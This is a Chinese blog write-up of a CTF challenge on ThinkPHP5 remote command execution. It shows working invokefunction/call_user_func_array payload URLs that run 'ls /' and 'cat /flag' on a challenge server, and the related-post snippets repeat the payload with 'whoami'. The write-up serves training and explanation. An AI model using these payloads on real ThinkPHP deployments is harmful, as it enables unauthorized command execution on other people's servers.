【攻防世界】php_rce (ThinkPHP5)

已于 2024-04-09 20:23:46 修改
阅读量544 收藏 4
点赞数 4
分类专栏: 攻防世界 文章标签: php 命令执行漏洞
于 2024-04-09 19:30:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79800344/article/details/137563810
版权

进入题目环境,查看页面信息:

页面提示 ThinkPHP V5,猜测存在ThinkPHP5 版本框架的漏洞,于是查找 ThinkPHP5 的攻击POC。

构造 payload: http://61.147.171.105:50126/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls / 

这个URL的目的是利用 ThinkPHP 框架中的 invokefunction 方法,通过调用 call_user_func_array 函数来执行系统命令 ls /,从而列出服务器根目录下的文件和目录。这种形式的攻击称为远程命令执行(RCE)攻击,如果应用程序没有适当的安全措施来验证和过滤用户提供的输入,可能会导致严重的安全问题。因此,开发者应该在编写代码时严格验证和过滤用户输入,以防止此类攻击。

call_user_func_array()函数:

call_user_func_array(参数一,参数二):

参数一:表示一个回调函数。

参数二:表示传递给这个回调函数的参数,参数二的数据类型为数组。

如果回调函数成功执行,则返回执行结果,否则返回False值。

首先利用 system("ls") 指令查看当前目录下的文件名:

发现当前目录下有文件夹(也有可能是文件) flag,flag值大概率在 flag 中,构造 payload:http://61.147.171.105:50126/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cd flag& ls / 

发现指令未被执行,无回显。

在 Linux 中,cd 命令是用于切换当前工作目录的命令,它只能用于切换到文件夹(目录)中,而不能直接切换到文件中。如果你尝试执行类似 cd fkag 这样的命令,Linux 系统会返回一个错误,提示指定的路径不是一个目录,则说明 flag 是一个文件,直接查询即可。

构造 payload:http://61.147.171.105:50126/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

因为使用 ls /指令查询时 flag 在根目录下 ,故使用 cat /flag 而不是用 cat flag。提交页面如下:

给我杯冰美式
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
TDOA_RCE:通达OA综合利用工具
03-03
工具说明 通达OA综合利用工具_20210224 集成POC如下 任意用户登录POC:4个SQL注入POC:2个后台文件上传POC:3个本地文件包含POC:2个前台文件上传POC(非WEB目录):1个任意文件删除POC:1个 工具面板截图 ...
【CTF | 网络安全】攻防世界 php_rce 解题详析
等风来
05-22 4925
[CTF/网络安全] 攻防世界 php_rce 解题详析
攻防世界——php_rce
qq_60905276的博客
11-11 1694
我看不懂,查一下资料发现ThinkPHP V5曾经出现一个漏洞,来学习一下。 ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。 看得出来程序没经过控制器进行过滤,所以可以用/来控制程序。 搞不懂这个漏洞是怎么搞出来的,借用一下大神的答案。 ?
php_rce(攻防世界lv.2)
qq_66013948的博客
10-25 269
可以看到当前目录内的文件,既然这样能够成功,那么我们就可以试着把退回根目录找有关flag的文件夹或者文件,最后在根目录上找的了个flag的文件夹,之后就是构造payload为。这是一道关于thinkphp5的一个典型的rce漏洞,可以去。里面看有关漏洞的分析,通常构造的payload为。可以看到flag了。
php_rce(攻防世界
m0_70819573的博客
02-20 252
2.关于thinkphp的框架漏洞,可以参考。1.打开主页,提示了thinkphp版本较低。poc和exp有一大堆。
攻防世界web高手进阶php_rce,php_rce 攻防世界xctf web
weixin_39603613的博客
03-09 245
php_rce首先了解ThinkPHP5.x rec 漏洞分析与复现https://blog.csdn.net/qq_40884727/article/details/101452478var_pathinfo的默认配置为s,我们可以通过$_GET[‘s’]来传参于是构造payloadhttp://111.198.29.45:30600/index.php?s=index/\think\App/i...
攻防世界php_rce
weixin_52268949的博客
01-20 876
php_rce 进入题目提示为ThinkPHP V5 遇到这种题我们一般去找一下框架的rce漏洞即可,搜索到这样一篇文章 https://www.freebuf.com/articles/web/289860.html 然后我们直接使用这里面的payload ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 成功rce 接下来就是找fl
攻防世界-php_rce(远程执行漏洞)
m0_62094846的博客
12-21 1341
打开可以看到一个比较真实的网站,也有超链接可以连接到其他的网站 看到ThinkPHP就可以想到远程执行漏洞(看wp) 语句: index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php代码 index.php?s=index/\think\app/invokefunction&function=call_use...
攻防世界-web篇(php_rce)详解
qq_54803507的博客
09-25 2331
web篇(php_rce)详解
攻防世界-php_rce
m0_49025459的博客
12-21 241
在网络中,以http开头的链接都是绝对路径,绝对路径就是你的主页上的文件或目录在硬盘上真正的路径,绝对路径一般在CGI程序的路径配置中经常用到,而在制作网页中实际很少用到。2、绝对路径:就是你的主页上的文件或目录在硬盘上真正的路径。绝对路径就是你的主页上的文件或目录在硬盘上真正的路径,比如,你的Perl 程序是存放在 c:/apache/1、相对路径:顾名思义,相对路径就是相对于当前文件的路径。-bin 下的,那么 c:/apache/cgi-bin就是cgi-bin目录的绝对路径。:代表目前所在的目录。
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
RCE.zip_RCE网络_rce_rce分类器
07-14
基于模式识别的RCE网络算法分类器(衰减库仑势法)。利用概率密度进行分类
thinkphp 一键漏洞检测
12-09
thinkphp 一键漏洞检测,V3.2.0~V5.1.23,都可进行测试
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码中的assign法中第个变量为可控变量: 3.赋值结束后进display法中,display法开始解析并获取模板件内容,此
【Web】CTFSHOW 中期测评刷题记录(1)
uuzeray的博客
05-02 1705
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
Web安全研究(九)
至臻求学,胸怀云月
05-05 1123
这段代码事实上实现了一个 webshell 的基本功能,因为它允许通过 URL 参数直接控制和执行服务器端的代码,极其危险。在实际应用开发中,应避免直接使用eval函数,特别是当其包含来自用户输入的数据时。同时,也应该对所有用户输入进行严格的验证和过滤,以减少潜在的安全风险。
PHP 在字符中找出重复次数最多的字符
zzjnlwb的专栏
05-06 271
应该也还有其他很多办法!等我遇到了再更新本篇!我感觉这是最简单的一种办法!
免费的发票查验接口平台 PHP开发示例
最新发布
weixin_49544544的博客
05-07 258
发票识别接口,自主ocr核心技术,无论是增值税发票、火车票、打车票还是财政类票据,仅需一键上传即可快速、精准识别全票面信息,且可进行发票的自动分类,避免了人工录入的误差,提升了发票管理数字化效率与准确率。传统手动录入的方式不仅耗时长,繁琐低效,且容易出现人为错漏的风险,让财务工作者头疼不已。发票识别+发票查验接口可以解决票据信息录入繁琐、易出错等一系列难题,体验发票管理的革命性飞跃。发票查验接口,实时联网查验增值税发票管理系统开具发票的真伪,核验为真还可返回全票面信息,且可进行发票的批量核验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值